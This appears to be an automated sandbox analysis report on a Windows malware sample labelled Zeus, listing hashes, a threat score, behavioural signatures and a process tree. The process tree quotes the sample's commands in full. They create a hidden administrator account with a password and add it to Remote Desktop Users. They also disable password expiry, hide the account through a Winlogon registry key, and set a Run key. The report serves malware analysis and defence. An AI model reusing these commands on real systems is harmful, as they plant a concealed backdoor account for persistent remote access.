Analysis
-
max time kernel
117s -
max time network
137s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
19-07-2020 16:48
Static task
static1
Behavioral task
behavioral1
Sample
zeus 2_2.1.0.3.vir.exe
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
zeus 2_2.1.0.3.vir.exe
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
zeus 2_2.1.0.3.vir.exe
-
Size
199KB
-
MD5
dc6b98b9707c0922ab6a53b3efdd5dac
-
SHA1
a72e76fbd5dfa53b3d27ed9d9e6d194a085d7d0e
-
SHA256
f55d6bd5f13356eda64fae070a5eee1a080f06a0aa69bdd7e137496d88346be3
-
SHA512
04b730c73876fc89eb465ebc069ad1e1bdbfbf5d1654a4bb49457d87ec290dd1832a571dea47adabea0d3f3c0461f8ce70d10fe2e4a82cbb698fed254c5d269b
Score
9/10
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
new.exepid process 3984 new.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
zeus 2_2.1.0.3.vir.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\disable_nasty_checks = "setx SEE_MASK_NOZONECHECKS 1" zeus 2_2.1.0.3.vir.exe -
Runs ping.exe 1 TTPs 5 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEpid process 3532 PING.EXE 724 PING.EXE 1284 PING.EXE 2352 PING.EXE 1808 PING.EXE -
Runs net.exe
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies WinLogon 2 TTPs 3 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\rootid = "0" reg.exe -
Suspicious use of WriteProcessMemory 54 IoCs
Processes:
zeus 2_2.1.0.3.vir.execmd.exenet.exenet.exenet.exenet.exenew.exedescription pid process target process PID 1820 wrote to memory of 2500 1820 zeus 2_2.1.0.3.vir.exe cmd.exe PID 1820 wrote to memory of 2500 1820 zeus 2_2.1.0.3.vir.exe cmd.exe PID 1820 wrote to memory of 2500 1820 zeus 2_2.1.0.3.vir.exe cmd.exe PID 1820 wrote to memory of 2756 1820 zeus 2_2.1.0.3.vir.exe cscript.exe PID 1820 wrote to memory of 2756 1820 zeus 2_2.1.0.3.vir.exe cscript.exe PID 1820 wrote to memory of 2756 1820 zeus 2_2.1.0.3.vir.exe cscript.exe PID 2500 wrote to memory of 3532 2500 cmd.exe PING.EXE PID 2500 wrote to memory of 3532 2500 cmd.exe PING.EXE PID 2500 wrote to memory of 3532 2500 cmd.exe PING.EXE PID 1820 wrote to memory of 3604 1820 zeus 2_2.1.0.3.vir.exe net.exe PID 1820 wrote to memory of 3604 1820 zeus 2_2.1.0.3.vir.exe net.exe PID 1820 wrote to memory of 3604 1820 zeus 2_2.1.0.3.vir.exe net.exe PID 3604 wrote to memory of 3840 3604 net.exe net1.exe PID 3604 wrote to memory of 3840 3604 net.exe net1.exe PID 3604 wrote to memory of 3840 3604 net.exe net1.exe PID 1820 wrote to memory of 3928 1820 zeus 2_2.1.0.3.vir.exe net.exe PID 1820 wrote to memory of 3928 1820 zeus 2_2.1.0.3.vir.exe net.exe PID 1820 wrote to memory of 3928 1820 zeus 2_2.1.0.3.vir.exe net.exe PID 3928 wrote to memory of 3904 3928 net.exe net1.exe PID 3928 wrote to memory of 3904 3928 net.exe net1.exe PID 3928 wrote to memory of 3904 3928 net.exe net1.exe PID 1820 wrote to memory of 1872 1820 zeus 2_2.1.0.3.vir.exe net.exe PID 1820 wrote to memory of 1872 1820 zeus 2_2.1.0.3.vir.exe net.exe PID 1820 wrote to memory of 1872 1820 zeus 2_2.1.0.3.vir.exe net.exe PID 1872 wrote to memory of 2220 1872 net.exe net1.exe PID 1872 wrote to memory of 2220 1872 net.exe net1.exe PID 1872 wrote to memory of 2220 1872 net.exe net1.exe PID 1820 wrote to memory of 3764 1820 zeus 2_2.1.0.3.vir.exe net.exe PID 1820 wrote to memory of 3764 1820 zeus 2_2.1.0.3.vir.exe net.exe PID 1820 wrote to memory of 3764 1820 zeus 2_2.1.0.3.vir.exe net.exe PID 3764 wrote to memory of 636 3764 net.exe net1.exe PID 3764 wrote to memory of 636 3764 net.exe net1.exe PID 3764 wrote to memory of 636 3764 net.exe net1.exe PID 2500 wrote to memory of 724 2500 cmd.exe PING.EXE PID 2500 wrote to memory of 724 2500 cmd.exe PING.EXE PID 2500 wrote to memory of 724 2500 cmd.exe PING.EXE PID 1820 wrote to memory of 672 1820 zeus 2_2.1.0.3.vir.exe reg.exe PID 1820 wrote to memory of 672 1820 zeus 2_2.1.0.3.vir.exe reg.exe PID 1820 wrote to memory of 672 1820 zeus 2_2.1.0.3.vir.exe reg.exe PID 1820 wrote to memory of 3984 1820 zeus 2_2.1.0.3.vir.exe new.exe PID 1820 wrote to memory of 3984 1820 zeus 2_2.1.0.3.vir.exe new.exe PID 1820 wrote to memory of 3984 1820 zeus 2_2.1.0.3.vir.exe new.exe PID 3984 wrote to memory of 904 3984 new.exe new.exe PID 3984 wrote to memory of 904 3984 new.exe new.exe PID 3984 wrote to memory of 904 3984 new.exe new.exe PID 2500 wrote to memory of 1284 2500 cmd.exe PING.EXE PID 2500 wrote to memory of 1284 2500 cmd.exe PING.EXE PID 2500 wrote to memory of 1284 2500 cmd.exe PING.EXE PID 2500 wrote to memory of 2352 2500 cmd.exe PING.EXE PID 2500 wrote to memory of 2352 2500 cmd.exe PING.EXE PID 2500 wrote to memory of 2352 2500 cmd.exe PING.EXE PID 2500 wrote to memory of 1808 2500 cmd.exe PING.EXE PID 2500 wrote to memory of 1808 2500 cmd.exe PING.EXE PID 2500 wrote to memory of 1808 2500 cmd.exe PING.EXE
Processes
-
C:\Users\Admin\AppData\Local\Temp\zeus 2_2.1.0.3.vir.exe"C:\Users\Admin\AppData\Local\Temp\zeus 2_2.1.0.3.vir.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\delme.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 33⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 33⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 33⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 33⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 33⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\cscript.execscript ldapdi.vbs2⤵
-
C:\Windows\SysWOW64\net.exeC:\Windows\system32\net.exe user rootid Stormload0987 /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user rootid Stormload0987 /add3⤵
-
C:\Windows\SysWOW64\net.exeC:\Windows\system32\net.exe localgroup Administrators rootid /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators rootid /add3⤵
-
C:\Windows\SysWOW64\net.exeC:\Windows\system32\net.exe localgroup "Remote Desktop Users" rootid /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" rootid /add3⤵
-
C:\Windows\SysWOW64\net.exeC:\Windows\system32\net.exe accounts /maxpwage:unlimited2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited3⤵
-
C:\Windows\SysWOW64\reg.exeC:\Windows\system32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v rootid /t REG_DWORD /d "00000000" /f2⤵
- Modifies WinLogon
-
C:\Users\Admin\AppData\Local\Temp\new.exenew.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\new.exe"C:\Users\Admin\AppData\Local\Temp\new.exe"3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\delme.bat
-
C:\Users\Admin\AppData\Local\Temp\ldapdi.vbs
-
C:\Users\Admin\AppData\Local\Temp\new.exe
-
C:\Users\Admin\AppData\Local\Temp\new.exe
-
memory/636-12-0x0000000000000000-mapping.dmp
-
memory/672-14-0x0000000000000000-mapping.dmp
-
memory/724-13-0x0000000000000000-mapping.dmp
-
memory/1284-18-0x0000000000000000-mapping.dmp
-
memory/1808-20-0x0000000000000000-mapping.dmp
-
memory/1872-9-0x0000000000000000-mapping.dmp
-
memory/2220-10-0x0000000000000000-mapping.dmp
-
memory/2352-19-0x0000000000000000-mapping.dmp
-
memory/2500-0-0x0000000000000000-mapping.dmp
-
memory/2756-1-0x0000000000000000-mapping.dmp
-
memory/3532-3-0x0000000000000000-mapping.dmp
-
memory/3604-5-0x0000000000000000-mapping.dmp
-
memory/3764-11-0x0000000000000000-mapping.dmp
-
memory/3840-6-0x0000000000000000-mapping.dmp
-
memory/3904-8-0x0000000000000000-mapping.dmp
-
memory/3928-7-0x0000000000000000-mapping.dmp
-
memory/3984-15-0x0000000000000000-mapping.dmp